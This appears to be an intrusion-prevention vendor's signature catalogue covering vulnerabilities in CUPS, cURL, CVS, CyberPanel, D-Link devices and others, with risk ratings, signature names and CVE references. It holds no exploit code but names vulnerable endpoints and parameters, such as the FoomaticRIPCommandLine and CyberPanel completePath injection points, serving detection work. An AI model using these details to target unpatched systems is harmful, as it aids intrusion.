http://www.securityfocus.com/bid/28544

CUPS-Remote-Command-Execution-Via-FoomaticRIPCommandLine-CVE-2024-47177

About this vulnerability:

An attempt to exploit a vulnerability in cups-filters detected

Risk:

High

First detected in:

sgpkg-ips-1783-5242

Last changed:

sgpkg-ips-1783-5242

Platform:

Generic

Software:

cups-filters

Type:

Input Validation

Description:

CUPS is an open-source printing system, and cups-filters is a service that provides backends, filters, and other software for CUPS 2.x to use on non-Mac OS systems. Any value passed to "FoomaticRIPCommandLine" via a PPD file will be executed as a user controlled command. When combined with other logic bugs as described in CVE_2024-47176, this can lead to remote command execution.

Situation:

File-Binary_CUPS-Remote-Command-Execution-Via-FoomaticRIPCommandLine-CVE-2024-47177

References:

CVE-2024-47177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47177

CUPS-Text-To-PostScript-texttops-Filter-Integer-Overflow

About this vulnerability:

An integer overflow vulnerability in Common UNIX Printing System (CUPS)

Risk:

High

First detected in:

sgpkg-ips-189-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Common UNIX Printing System

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in the Common UNIX Printing System (CUPS). There is a boundary error in the texttops application when calculating the page size used for storing PostScript data. A remote attacker can exploit this vulnerability to compromise a vulnerable system.

Situation:

HTTP_CS-CUPS-Text-To-PostScript-texttops-Filter-Integer-Overflow

References:

CVE-2008-3640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3640

BID-31690
http://www.securityfocus.com/bid/31690

Curl-And-Libcurl-Cookie-Path-Parsing-Remote-Code-Execution

About this vulnerability:

A vulnerability in cURL Project libcurl

Risk:

Moderate

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

cURL

Type:

Malfunction

Description:

A heap buffer underflow vulnerability exists in cURL and libcurl. The vulnerability is due error when parsing a cookie path in an HTTP response. A remote, unauthenticated attackers can exploit this vulnerability by enticing user to perform a cURL on a crafted URL or provide malicious HTTP response to an application that uses libcurl. Successful exploitation could cause arbitrary code execution, unsuccessful exploitation may cause a crash resulting a denial of service condition.

Situation:

HTTP_SHS-Curl-And-Libcurl-Cookie-Path-Parsing-Remote-Code-Execution

References:

CVE-2015-3145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3145

OSVDB-121130
http://www.osvdb.org/121130

Curl-And-Libcurl-md5-Digest-Buffer-Overflow

About this vulnerability:

A vulnerability in cURL Project cURL

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

cURL

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability exists in cURL/libcurl. The vulnerability is due to an error in Curl_sasl_create_digest_md5_message() while negotiating SASL DIGEST-MD5 authentication. A remote attacker can exploit this vulnerability by enticing a user to connect to a malicious server. This can lead to code execution in the context of the affected application. If code execution is unsuccessful, a denial of service condition may result.

Situation:

POP3_SS-Curl-And-Libcurl-md5-Digest-Buffer-Overflow

References:

CVE-2013-0249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0249

OSVDB-89988
http://www.osvdb.org/89988

Curl-And-Libcurl-Ntlm-Type-3-Message-Creation-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in cURL Project cURL

Risk:

Moderate

First detected in:

sgpkg-ips-1147-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

cURL

Type:

Buffer Overflow

Description:

Insufficient validation of NTLM type-2 messages when creating a type-3 request message in the Curl_auth_create_ntlm_type3_message function causes a stack buffer overflow vulnerability. A successful attack may allow an attacker to run arbitrary code on the target system.

Situation:

HTTP_SHS-Curl-And-Libcurl-Ntlm-Type-3-Message-Creation-Stack-Based-Buffer-Overflow

References:

CVE-2019-3822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3822

Curl-And-Libcurl-TFTP-blksize-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in cURL Project cURL

Risk:

High

First detected in:

sgpkg-ips-1199-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

cURL

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability exists in cURL/libcurl which allows remote attackers to execute arbitrary code by enticing a target user into running cURL on a malicious URL.

Situation:

TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Data-And-Error-Packet-BOF
TFTP_SS-Curl-And-Libcurl-TFTP-blksize-Heap-Buffer-Overflow

References:

CVE-2019-5436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5436

Curl-And-Libcurl-TFTP-OACK-blksize-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in cURL Project cURL

Risk:

High

First detected in:

sgpkg-ips-1198-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

cURL

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability exists in cURL/libcurl which allows remote attackers to execute arbitrary code due to improper allocation of memory when processing TFTP responses in tftp_receive_packet().

Situation:

Generic_UDP-Curl-And-Libcurl-TFTP-OACK-blksize-Heap-Buffer-Overflow

References:

CVE-2019-5482
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5482

Curl-SOCKS5-Heap-Buffer-Overflow-CVE-2023-38545

About this vulnerability:

A vulnerability in cURL

Risk:

High

First detected in:

sgpkg-ips-1639-5242

Last changed:

sgpkg-ips-1639-5242

Platform:

Generic

Software:

cURL

Type:

Malfunction

Description:

A heap buffer overflow vulnerability has been reported in cURL/libcurl.

Situation:

Generic_TCP-Curl-SOCKS5-Heap-Buffer-Overflow-CVE-2023-38545
HTTP_SHS-Suspiciously-Long-Reply-Header

References:

CVE-2023-38545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38545

Cutwail-Bot

About this vulnerability:	Cutwail Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Cutwail is a Botnet mostly used for sending e-mail spam.
Situation:	HTTP_CSU-Cutwail-Bot-Activity

CVS-Annotate-Command-Long-Revision-String-Buffer-Overflow

About this vulnerability:

Annotate command buffer overflow vulnerability in CVS

Risk:

Moderate

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CVS

Type:

Buffer Overflow

Description:

CVS has a buffer overflow vulnerability due to copying the revision number string to a fixed size buffer without boundary checking when handling the annotate command. A successful exploitation of this vulnerability leads to a DoS condition.

Situation:

VC_CVS-Annotate-Command-Long-Revision-String-Buffer-Overflow

References:

CVE-2005-0753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0753

BID-13217
http://www.securityfocus.com/bid/13217

OSVDB-15670
http://www.osvdb.org/15670

CVS-Directory-Request-Double-Free-Heap-Corruption-Vulnerability

About this vulnerability:

Heap corruption in CVS pserver

Risk:

Critical

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

CVS

Type:

Malfunction

Description:

A flaw in CVS pserver can be exploited by a malicious user to gain superuser access to the system.

Situation:

VC_CVS-Directory-Request-Double-Free

References:

CVE-2003-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0015

BID-6650
http://www.securityfocus.com/bid/6650

CVS-Entry-Line-Flag-Heap-Overflow

About this vulnerability:

CVS Malformed Entry Modified and Unchanged Flag Insertion Heap Overflow Vulnerability

Risk:

High

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

CVS

Type:

Malfunction

Description:

CVS is prone to a remote heap overflow vulnerability. This issue presents itself during the handling of user-supplied input for entry lines with 'modified' and 'unchanged' flags. This vulnerability can allow an attacker to overflow a vulnerable buffer on the heap, possibly leading to arbitrary code execution.

Situation:

VC_CVS-Entry-Line-Flag-Heap-Overflow-Linux
VC_CVS-Entry-Line-Flag-Heap-Overflow-BSD

References:

CVE-2004-0396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0396

BID-10384
http://www.securityfocus.com/bid/10384

OSVDB-6305
http://www.osvdb.org/6305

CVS-Error-Prog-Name-Double-Free

About this vulnerability:

Double-free vulnerability for the error_prog_name string in CVS

Risk:

High

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

CVS

Type:

Malfunction

Description:

CVS feature versions 1.12.8 and earlier, stable versions 1.11.16 and earlier running on Linux operating systems have a double-free vulnerability with error_prog_name, which is utilized in error messages and the Argumentx command. The Argumentx command fails to validate if there is an argument in the argument list, when adding additional data to a previously supplied argument. A remote attacker could exploit this vulnerability to execute arbitrary code on the system.

Situation:

VC_CVS-Argumentx-Command-Double-Free
VC_CVS-Error-Prog-Name-Double-Free

References:

CVE-2004-0416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0416

BID-10499
http://www.securityfocus.com/bid/10499

OSVDB-6831
http://www.osvdb.org/6831

CVS-File-Existence-Information-Disclosure

About this vulnerability:

A vulnerability in CVS

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CVS

Type:

Malfunction

Description:

A weakness exists in the Concurrent Versions System (CVS) with the cvs "history" command. An anonymous or low-privileged attacker can exploit this weakness to gain information about files on a CVS server.

Situation:

VC_CVS-File-Existence-Information-Disclosure

References:

CVE-2004-0788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0788

BID-11195
http://www.securityfocus.com/bid/11195

CVS-Max-Dotdot-Integer-Overflow

About this vulnerability:

Integer overflow in the "Max-dotdot" CVS protocol command

Risk:

Moderate

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

CVS

Type:

Malfunction

Description:

An integer overflow within the "Max-dotdot" CVS protocol command allows crashing the CVS server. While CVS server processes are usually forked, a crash usually leaves data in the temporary file directory. This means that on non-partitioned servers this bug could be used to fill the hard-disk completely.

Situation:

VC_CVS-Max-Dotdot-Integer-Overflow

References:

CVE-2004-0417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0417

BID-10499
http://www.securityfocus.com/bid/10499

OSVDB-6832
http://www.osvdb.org/6832

CyberArk-Password-Vault-Web-Access-Remote-Code-Execution

About this vulnerability:

A vulnerability in CyberArk Password Vault Web Access

Risk:

High

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CyberArk Password Vault Web Access

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in CyberArk Password Vault Web Access application. A remote attacker can construct a malicious request which enables the attacker to gain unauthenticated remote code execution on the affected system.

Situation:

HTTP_CSH-CyberArk-Password-Vault-Web-Access-Remote-Code-Execution

References:

CVE-2018-9843
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9843

Cyberpanel-Incorrect-Default-Permissions-Vulnerability

About this vulnerability:

A vulnerability in CyberPanel

Risk:

Moderate

First detected in:

sgpkg-ips-1808-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Generic

Software:

CyberPanel

Type:

Input Validation

Description:

A command injection vulnerability has been reported in CyberPanel. The vulnerability is due to improper validation of user input when using the getresetstatus API endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary command execution under the security context of the root user.

References:

CVE-2024-51378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51378

Cyberpanel-Remote-Code-Execution-CVE-2024-51567

About this vulnerability:

A vulnerability in CyberPanel

Risk:

Critical

First detected in:

sgpkg-ips-1798-5242

Last changed:

sgpkg-ips-1798-5242

Platform:

Generic

Software:

CyberPanel

Type:

Input Validation

Description:

An authentication bypass vulnerability together with a command execution vulnerability in CyberPanel versions through 2.3.6 and 2.3.7 allow a remote attacker to execute arbitrary code.

Situation:

HTTP_CS-Cyberpanel-Getresetstatus-Command-Injection

References:

CVE-2024-51567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51567

Cyberpanel-Remote-Code-Execution-Via-completePath-Parameter-CVE-2024-51568

About this vulnerability:

An attempt to exploit a vulnerability in CyberPanel detected

Risk:

High

First detected in:

sgpkg-ips-1820-5242

Last changed:

sgpkg-ips-1820-5242

Platform:

Generic

Software:

CyberPanel

Type:

Input Validation

Description:

CyberPanel before 2.3.5 allows command injection via the "completePath" parameter in the ProcessUtilities.outputExecutioner() sink. The "/filemanager/upload" (aka File Manager upload) endpoint allows unauthenticated remote code execution using shell metacharacters.

Situation:

HTTP_CRL-Cyberpanel-Remote-Code-Execution-Via-completePath-Parameter-CVE-2024-51568

References:

CVE-2024-51568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51568

Cyberpanel-submitWebsiteCreation-Command-Injection-CVE-2024-53376

About this vulnerability:

A vulnerability in CyberPanel

Risk:

High

First detected in:

sgpkg-ips-1872-5242

Last changed:

sgpkg-ips-1872-5242

Platform:

Generic

Software:

CyberPanel

Type:

Input Validation

Description:

An vulnerability in CyberPanel, versions before v2.3.8, which allows remote attackers to execute arbitrary code on a target server due to improper validation of user input when calling the submitWebsiteCreation function.

Situation:

HTTP_CS-Cyberpanel-submitWebsiteCreation-Command-Injection-CVE-2024-53376

References:

CVE-2024-53376
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53376

Cyberpower-Powerpanel-Business-Import-Profile-Directory-Traversal

About this vulnerability:

A vulnerability in CyberPower PowerPanel Business

Risk:

High

First detected in:

sgpkg-ips-1732-5242

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

CyberPower PowerPanel Business

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in CyberPower PowerPanel Business. The vulnerability is due to improper validation of filenames in zip files when uploading configuration profiles. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM or the root user.

Situation:

File-Zip_Cyberpower-Powerpanel-Business-Import-Profile-Directory-Traversal

References:

CVE-2024-33615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33615

Cyberstop-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability:

Denial of Service (DoS) vulnerability in Cyberstop HTTP server

Risk:

Low

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Cyberstop Web Server

Type:

Malfunction

Description:

Cyberstop HTTP Server for Windows is vulnerable to a Denial of Service (DoS) attack. An attacker can send an URL request appended with an MSDOS device name to the server to cause the server to crash.

Situation:

HTTP_CRL-Cyclope-Employee-Surveillance-Solution-SQL-Injection

References:

CVE-2002-0200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0200

BID-3929
http://www.securityfocus.com/bid/3929

OSVDB-11346
http://www.osvdb.org/11346

Cycbot-Bot

About this vulnerability:	Cycbot Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Cycbot is a Bot that creates a backdoor on the infected machine. It may also redirect browser traffic and install additional malware.
Situation:	HTTP_CSH-Cycbot-Bot-Traffic

Cyclope-Employee-Surveillance-Solution-SQL-Injection

About this vulnerability:

A Cyclope Employee Surveillance Solution SQL Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Cyclope Employee Surveillance Solution

Type:

SQL Injection

Description:

A vulnerability in Cyclope Employee Surveillance Solution, versions 6.2 and before, that allows remote attackers to manipulate the SQL query and execute arbitrary code due to the mishandling of the username parameter.

Situation:

References:

OSVDB-84517
http://www.osvdb.org/84517

CYME-Multiple-Products-Chartfx.clientserver.core.dll-Remote-Code-Execution

About this vulnerability:

A vulnerability in CYME Distribution System Analysis

Risk:

Moderate

First detected in:

sgpkg-ips-489-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CYME Distribution System Analysis; CYME Power Engineering Software

Type:

Malfunction

Description:

There is a code execution vulnerability in CYME multiple products. The vulnerability is due to insufficient input validation while handling parameters to the ChartFX ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious web site. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.

Situation:

File-Text_CYME-Multiple-Products-Chartfx-Remote-Code-Execution

References:

OSVDB-85894
http://www.osvdb.org/85894

Cyrus-IMAP-Server-IMAPMAGICPLUS-Buffer-Overflow

About this vulnerability:

A vulnerability in Cyrus IMAP Server

Risk:

High

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cyrus IMAP Server

Type:

Buffer Overflow

Description:

There is a vulnerability in the way Cyrus IMAP Server processes the LOGIN commands. When the server option IMAPMAGICPLUS is enabled, an overly long username parameter passed to these commands will trigger a stack-based buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code on the target with the privileges of standard system user.

Situation:

IMAP_Cyrus-IMAP-Server-IMAPMAGICPLUS-Buffer-Overflow

References:

CVE-2004-1011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1011

D-Link-Backdoor-CVE-2013-6026

About this vulnerability:

A known backdoor in D-Link routers

Risk:

High

First detected in:

sgpkg-ips-1322-5242

Last changed:

sgpkg-ips-1322-5242

Platform:

Generic

Software:

D-Link

Type:

Backdoor

Description:

The web interface on various D-Link routers contains a backdoor, which allows remote attackers to bypass authentication via a specific User-Agent HTTP header.

Situation:

HTTP_CSH-D-Link-Backdoor-CVE-2013-6026

References:

CVE-2013-6026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6026

D-Link-Central-WiFiManager-SQL-Injection

About this vulnerability:

A vulnerability in D-Link Central WiFi Manager

Risk:

High

First detected in:

sgpkg-ips-1338-5242

Last changed:

sgpkg-ips-1338-5242

Platform:

Generic

Software:

D-Link

Type:

SQL Injection

Description:

There exists a vulberability in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 which allows remote attackers to add and remove users, and to retrieve usernames, password hashes, and other data due to an exposed API endpoint in /Public/Conn.php.

Situation:

HTTP_CRL-D-Link-Central-WiFiManager-SQL-Injection

References:

CVE-2019-13373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13373

D-Link-Command-Injection-CVE-2019-16920

About this vulnerability:

A vulnerability in D-Link routers

Risk:

High

First detected in:

sgpkg-ips-1468-5242

Last changed:

sgpkg-ips-1468-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

A command injection vulnerability has been reported in D-Link DIR-655, DIR-866L, DIR-652, and DHP-1565 routers. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary code.

Situation:

HTTP_CRL-D-Link-Command-Injection-CVE-2019-16920

References:

CVE-2019-16920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16920

D-Link-Command-Injection-CVE-2024-3273

About this vulnerability:

A vulnerability D-Link NAS devices

Risk:

High

First detected in:

sgpkg-ips-1713-5242

Last changed:

sgpkg-ips-1713-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

A command injection vulnerability together with publicly known hardcoded credentials in nas_sharing.cgi of various out-of-support D-Link NAS devices may allow for unauthenticated command execution.

Situation:

HTTP_CSU-D-Link-Command-Injection-CVE-2024-3273

References:

CVE-2024-3273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3273

D-Link-CWM-100-Remote-Code-Execution

About this vulnerability:

A vulnerability in D-Link CWM 100

Risk:

High

First detected in:

sgpkg-ips-1292-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link CWM 100

Type:

Input Validation

Description:

There exists a vulnerability in D-Link CWM 100, versions before v1.03R0100_BETA6, which allows remote attackers to execute arbitrary PHP code due to the insufficient validation of the username cookie header.

Situation:

HTTP_CS-D-Link-CWM-100-Remote-Code-Execution

References:

CVE-2019-13372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13372

D-Link-D-View-Adddv7probe-External-Entity-Injection

About this vulnerability:

A vulnerability in D-Link D-View 8

Risk:

High

First detected in:

sgpkg-ips-1643-5242

Last changed:

sgpkg-ips-1643-5242

Platform:

Generic

Software:

D-Link D-View

Type:

Input Validation

Description:

An XXE vulnerability exists in D-Link D-View. This vulnerability is due to improper input validation in the addDv7Probe function. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the disclosure of information in the context of SYSTEM.

Situation:

HTTP_CS-D-Link-D-View-Adddv7probe-External-Entity-Injection

References:

CVE-2023-44412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44412

D-Link-D-View-Executewmiccmd-Command-Injection

About this vulnerability:

A vulnerability in D-Link D-View

Risk:

Moderate

First detected in:

sgpkg-ips-1734-5242

Last changed:

sgpkg-ips-1734-5242

Platform:

Generic

Software:

D-Link D-View

Type:

Input Validation

Description:

Improper validation of a user-supplied string causes a command injection vulnerability in D-Link D-View. A successful exploitation can allow an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-D-Link-D-View-Executewmiccmd-Command-Injection

References:

CVE-2024-5297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5297

D-Link-D-View-Tftpreceivefilehandler-Directory-Traversal

About this vulnerability:

A vulnerability in D-Link D-View

Risk:

High

First detected in:

sgpkg-ips-1627-5242

Last changed:

sgpkg-ips-1627-5242

Platform:

Generic

Software:

D-Link D-View

Type:

Directory Traversal

Description:

A directory traversal exists in D-Link D-View. The vulnerability is due to input validation error in TftpReceiveFileHandler class. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of SYSTEM.

Situation:

TFTP_Trivial-File-Transfer-Protocol-Directory-Traversal

References:

CVE-2023-32165
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32165

D-Link-D-View-Uploadfile-Directory-Traversal

About this vulnerability:

A vulnerability in D-Link D-View 8

Risk:

Moderate

First detected in:

sgpkg-ips-1657-5242

Last changed:

sgpkg-ips-1657-5242

Platform:

Generic

Software:

D-Link

Type:

Directory Traversal

Description:

A directory traversal vulnerability been reported for D-Link D-View. This vulnerability is due to improper input validation in the uploadFile function. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result arbitrary file creation in the context of SYSTEM.

Situation:

HTTP_CS-D-Link-D-View-Uploadfile-Directory-Traversal

References:

CVE-2023-32166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32166

D-Link-D-View-Uploadmib-Directory-Traversal

About this vulnerability:

A vulnerability in D-Link D-View

Risk:

High

First detected in:

sgpkg-ips-1638-5242

Last changed:

sgpkg-ips-1638-5242

Platform:

Generic

Software:

D-Link D-View

Type:

Directory Traversal

Description:

A directory traversal vulnerability been reported for D-Link D-View. This vulnerability is due to improper input validation in the uploadMib function. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file creation or deletion and potential code execution in the context of SYSTEM.

Situation:

HTTP_CS-D-Link-D-View-Uploadmib-Directory-Traversal

References:

CVE-2023-32167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32167

D-Link-DAP-1160-Unauthenticated-Remote-Reboot

About this vulnerability:

An attempt to exploit a vulnerability in D-Link DAP-1160 detected.

Risk:

High

First detected in:

sgpkg-ips-1060-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link

Type:

Insecure Configuration

Description:

A vulnerability in the D-Link DAP-1160, which has the DCCD deamon listening on UDP port 2003, which allows unathenticated remote attackers to send and execute commands to the device.

Situation:

Generic_UDP-D-Link-DAP-1160-Unauthenticated-Remote-Command

References:

BID-41187
http://www.securityfocus.com/bid/41187

OSVDB-66165
http://www.osvdb.org/66165

D-Link-DCS-2530L-DCS-2670L-Password-Disclosure-CVE-2020-25078

About this vulnerability:

A vulnerability in D-Link

Risk:

High

First detected in:

sgpkg-ips-1815-5242

Last changed:

sgpkg-ips-1815-5242

Platform:

Generic

Software:

D-Link

Type:

Malfunction

Description:

An unauthenticated /config/getuser endpoint in D-Link DCS-2530L and DCS-2670L devices allows a remote attacker to retrieve the administrator password.

Situation:

HTTP_CSU-D-Link-DCS-2530L-DCS-2670L-Password-Disclosure-CVE-2020-25078

References:

CVE-2020-25078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25078

D-Link-DCS-930L-Command-Execution-CVE-2016-11021

About this vulnerability:

A vulnerability in D-Link DCS-930L

Risk:

High

First detected in:

sgpkg-ips-1485-5242

Last changed:

sgpkg-ips-1485-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

A command execution vulnerability has been reported in the D-Link DCS-930L wireless network cameras with firmware versions before 2.12.

Situation:

HTTP_CRL-D-Link-DCS-930L-Command-Execution-CVE-2016-11021

References:

CVE-2016-11021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-11021

D-Link-DCS-931L-File-Upload

About this vulnerability:

A D-Link DCS-931L File Upload vulnerability.

Risk:

High

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link

Type:

Insecure Configuration

Description:

A vulnerability in D-Link DCS-931L with firmware 1.04, which allows remote attackers to execute arbitrary code by uploading files with executable extensions.

Situation:

HTTP_CRL-D-Link-DCS-931L-File-Upload

References:

CVE-2015-2049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2049

D-Link-ddns_check-Remote-Command-Execution-CVE-2021-45382

About this vulnerability:

A vulnerability in multiple D-Link routers

Risk:

High

First detected in:

sgpkg-ips-1468-5242

Last changed:

sgpkg-ips-1468-5242

Platform:

Generic

Software:

D-Link

Type:

Code Injection

Description:

A command injection vulnerability has been reported in D-Link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers. This vulnerability can allow unauthenticated attackers to execute arbitrary commands via crafted HTTP requests to ddns_check.ccp.

Situation:

HTTP_CRL-D-Link-ddns_check-Remote-Command-Execution-CVE-2021-45382

References:

CVE-2021-45382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45382

D-Link-Devices-Unauthenticated-ssdpcgi-RCE

About this vulnerability:

A vulnerability in D-Link ssdpcgi function

Risk:

High

First detected in:

sgpkg-ips-1222-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

D-Link

Type:

Input Validation

Description:

There exists a vulnerability in multiple D-Link devices that allows remote attackers to execute remote code due to the insufficient input valitation of the ssdpcgi function.

Situation:

Generic_UDP-D-Link-Devices-Unauthenticated-ssdpcgi-RCE

References:

CVE-2019-20215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20215

D-Link-Devices-UPnP-Soap-Command-Execution

About this vulnerability:

A D-Link Devices UPnP Soap Command Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-812-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

A vulnerability in multiple D-Link devices which allows remote attackers to execute arbitrary commands due to insufficient input validation.

Situation:

HTTP_CRL-D-Link-Devices-UPnP-Soap-Command-Execution

References:

BID-61005
http://www.securityfocus.com/bid/61005

OSVDB-94924
http://www.osvdb.org/94924

D-Link-DIR-2640-HNAP-EmailFrom-Command-Injection-Vulnerability

About this vulnerability:

An attempt to exploit a vulnerability in a D-Link DIR-2640 device detected

Risk:

High

First detected in:

sgpkg-ips-1645-5242

Last changed:

sgpkg-ips-1645-5242

Platform:

Generic

Software:

D-Link Systems DIR-2640

Type:

Input Validation

Description:

A vulnerability in D-Link DIR-2640 devices prior to v1.11B02_Beta_Hotfix, which allows remote attackers to execute arbitrary commands by sending malicious POST requests to /HNAP1/, due to insufficient validation of the <EmailFrom> parameter.

Situation:

HTTP_CRL-D-Link-DIR-2640-HNAP-EmailFrom-Command-Injection-Vulnerability

References:

CVE-2023-32153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32153

D-Link-Dir-2640-HNAP-Loginpassword-Authentication-Bypass-Vulnerability

About this vulnerability:

A vulnerability in D-Link Systems DIR-2640

Risk:

High

First detected in:

sgpkg-ips-1612-5242

Last changed:

sgpkg-ips-1612-5242

Platform:

Generic

Software:

D-Link Systems DIR-2640

Type:

Malfunction

Description:

Improper handling of incoming HNAP login requests causes an authentication bypass vulnerability in D-Link DIR-2640. A successful exploit allows an attacker log in to a vulnerable system.

Situation:

File-TextId_D-Link-Dir-2640-HNAP-Loginpassword-Authentication-Bypass-Vulnerability

References:

CVE-2023-32152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32152

D-Link-Dir-2640-HNAP-Prefixlen-Command-Injection-Vulnerability

About this vulnerability:

A vulnerability in D-Link Systems DIR-2640

Risk:

High

First detected in:

sgpkg-ips-1627-5242

Last changed:

sgpkg-ips-1627-5242

Platform:

Generic

Software:

D-Link Systems DIR-2640

Type:

Input Validation

Description:

A command injection vulnerability exists in D-Link DIR-2640 devices. The vulnerability is due to improper operation on incoming HNAP requests. A remote attacker can exploit the vulnerabilities by sending malicious requests to the vulnerable device. Successfully exploiting these vulnerabilities could result in command execution under the security context of root.

Situation:

File-TextId_D-Link-Dir-2640-HNAP-Prefixlen-Command-Injection-Vulnerability

References:

CVE-2023-32150
